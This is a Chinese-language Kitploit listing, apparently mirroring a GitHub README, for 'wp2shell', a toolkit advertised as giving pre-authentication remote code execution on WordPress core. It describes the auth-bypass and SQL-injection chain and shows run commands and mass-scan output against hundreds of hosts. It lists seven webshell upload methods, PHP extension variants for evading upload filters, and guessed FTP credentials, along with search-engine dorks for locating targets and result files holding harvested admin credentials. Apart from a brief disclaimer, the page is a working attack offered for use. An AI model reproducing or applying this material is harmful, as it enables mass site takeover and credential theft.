Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-63030 — WordPress Core 预认证 RCE — 批量路由混淆 + SQL 注入 | Kitploit
工具/GitHubGitHub/anggatechi/cve-2026-63030
侦察漏洞扫描器漏洞利用Web应用程序漏洞利用后渗透利用渗透测试
GitHubanggatechi/cve-2026-63030

CVE-2026-63030

WordPress Core 预认证 RCE — 批量路由混淆 + SQL 注入

查看仓库
12天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

wp2shell — WordPress 核心预认证 RCE

CVE-2026-63030(批量路由混淆)+ CVE-2026-60137(SQL 注入)

针对 WordPress 核心 wp2shell 漏洞链的零依赖利用工具包。仅需一个匿名 HTTP 请求,即可在默认 WordPress 安装上实现远程代码执行,无需任何插件。


📋 目录

  • 受影响版本
  • 利用流程
  • 快速开始
  • 演示
  • 功能特性
  • 上传方法
  • 输出文件
  • Dork / 搜索
  • 参考
  • 免责声明

🎯 受影响版本

版本范围影响修复版本
7.0.0 – 7.0.1完整 RCE7.0.2
6.9.0 – 6.9.4完整 RCE6.9.5

无需任何插件或特殊配置。 裸装的 WordPress 安装即可被利用。


🔗 利用流程

root@kitploit:~
┌─────────────────────────────────────┐
│  ANONYMOUS HTTP REQUEST             │
│  POST /?rest_route=/batch/v1        │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-63030: Batch Desync       │
│  Malformed path → WP_Error →        │
│  Array misalignment → Auth Bypass   │
└────────────────┬────────────────────┘
                 │
┌────────────────▼────────────────────┐
│  CVE-2026-60137: SQL Injection      │
│  author__not_in → unsanitized →     │
│  UNION SELECT extraction            │
└────────────────┬────────────────────┘
                 │
     ┌───────────┼───────────┐
     │           │           │
┌────▼────┐ ┌───▼────┐ ┌───▼──────────┐
│ oEmbed  │ │ Blind  │ │ Changeset    │
│ Seeding │ │ SQLi   │ │ Re-entrancy  │
│ Write   │ │ Read   │ │ Escalation   │
│ Cache   │ │ IDs    │ │ → Admin User │
└────┬────┘ └───┬────┘ └───┬──────────┘
     │           │           │
     └───────────┼───────────┘
                 │
┌────────────────▼────────────────────┐
│  ADMIN CREATED (pre-auth!)          │
│  → Login → Upload Shell (7 methods) │
└─────────────────────────────────────┘

🚀 快速开始

root@kitploit:~
pip install requests
python exploit.py
root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  WP2SHELL — WordPress Core Pre-Auth RCE Exploit              ║
║  CVE-2026-63030 (Batch Route Confusion) + CVE-2026-60137    ║
║  Affected: WP 6.9.0 – 7.0.1  |  Fixed: 6.9.5 / 7.0.2       ║
╚══════════════════════════════════════════════════════════════╝

  [?] Target [url/list.txt] > list.txt
  [?] Threads [15] > 15

单个目标

root@kitploit:~
python exploit.py
root@kitploit:~
  [?] Target [url/list.txt] > https://vulnerable-site.com

  ┌────────────────────────────────────────────────────────┐
  │                    SCAN CONFIGURATION                   │
  ├────────────────────────────────────────────────────────┤
  │  Targets : 1       Threads  : 1      Dir  : wp_core_rce│
  └────────────────────────────────────────────────────────┘

  ┌────────────────────────────────────────────────────────┐
  │  EXPLOIT SUCCESS                                       │
  ├────────────────────────────────────────────────────────┤
  │  Method : direct-plugin                                │
  │  Shell  : https://target.com/wp-content/plugins/...  │
  │  Login  : https://target.com/wp-login.php              │
  │  User   : wp2s_abc123def                               │
  │  Pass   : WP2S!xxxxxxxxxxxxxxxx                        │
  └────────────────────────────────────────────────────────┘

批量扫描

root@kitploit:~
python exploit.py
root@kitploit:~
┌────────────────────────────────────────────────────────┐
│                    SCAN CONFIGURATION                   │
├────────────────────────────────────────────────────────┤
│  Targets : 500    Threads  : 15     Dir  : wp_core_rce │
└────────────────────────────────────────────────────────┘
┌────────────┬────────────────────────────────────────┬──────────────┐
│            │                                        │              │
│  #/TOTAL   │ HOST                                   │ STATUS       │
├────────────┼────────────────────────────────────────┼──────────────┤
│    1/500   │ vulnerable-site.com                    │ SHELL        │
│            │   ↳ direct-plugin → https://vulnerabl...             │
│    2/500   │ target2.com                            │ ADM          │
│    3/500   │ safe-site.org                          │ SQLi         │
│    4/500   │ nope.com                               │ NO           │
│    5/500   │ jackpot.net                            │ SHELL        │
│            │   ↳ theme-editor → https://jackpot.ne...              │
└────────────┴────────────────────────────────────────┴──────────────┘
┌────────────────────────────────────────────────────────┐
│  SHELL     2   ADMIN    3   SQLi   15   TOTAL    50/500│
└────────────────────────────────────────────────────────┘
├────────────────────────────────────────────────────────┤
│  result.txt         │  admin credentials               │
│  result_upload.txt  │  shell upload URLs               │
│  log/scanned.txt    │  scanned hosts                   │
└────────────────────────────────────────────────────────┘

✨ 功能特性

  • 零依赖 — 仅使用 Python 3.11+ 标准库(requests 仅供扩展器使用)
  • 多线程 — 默认 15 线程,最高 30 线程
  • 自动续扫 — log/scanned.txt 自动跳过已扫描的目标
  • 静默批量模式 — 干净的表格输出,无日志刷屏
  • 自动检测 — 自动检查 WordPress + 批量 API + SQLi 可用性
  • 7 种并行上传方法 — 率先成功者获胜的竞争条件

📤 上传方法

所有 7 种方法通过 ThreadPoolExecutor 并行执行。最先成功的方法获胜,其余方法均被取消。

媒体上传扩展名: .phtml .php5 .php7 .php8 .pht .phar .shtml .php4 .phps .phtm .Php5 .PhP5 .pHtml .phP .PHP

尝试的 FTP 凭据: localhost / 127.0.0.1,搭配 root / www-data / WordPress 管理员凭据


📁 输出文件

文件内容
result.txt管理员凭据:url.com/wp-login.php:user:pass
result_upload.txtShell 地址:shell_url | login_url:user:pass | method
log/scanned.txt所有已扫描的主机(重新运行时自动跳过)

🔍 Dork / 搜索

Shodan

root@kitploit:~
http.title:"WordPress"
http.component:"WordPress"

Fofa

root@kitploit:~
app="WordPress"
body="wp-json"
body="/batch/v1"

ZoomEye

root@kitploit:~
app:"WordPress"
"/wp-json/batch/v1"

Censys

root@kitploit:~
services.http.response.body:"/wp-json/batch/v1"

📚 参考

  • Searchlight Cyber 安全公告
  • Hadrian 技术博客
  • WordPress 7.0.2 发布
  • Assetnote 研究
  • Wordfence 威胁情报

⚠️ 免责声明

本工具仅供授权的安全研究与渗透测试使用。仅可用于您拥有或已获得明确书面许可测试的系统。作者对任何滥用行为不承担任何责任。


📄 许可证

MIT 许可证。详见 LICENSE。

下载工具
6.8.0 – 6.8.5
仅 SQLi
6.8.6
#方法描述
1direct-plugin通过 /wp-admin/plugin-install.php 上传 zip
2direct-theme通过 /wp-admin/theme-install.php 上传 zip
3rest-api携带认证 cookie 将 zip POST 到 /wp-json/wp/v2/plugins
4plugin-editor通过 /wp-admin/plugin-editor.php 直接写入 PHP
5theme-editor将 PHP 写入当前启用的主题目录
6ftp-bypass当 WordPress 要求时提交 FTP 凭据
7media-upload通过媒体库上传 PHP,支持 15 种扩展名变体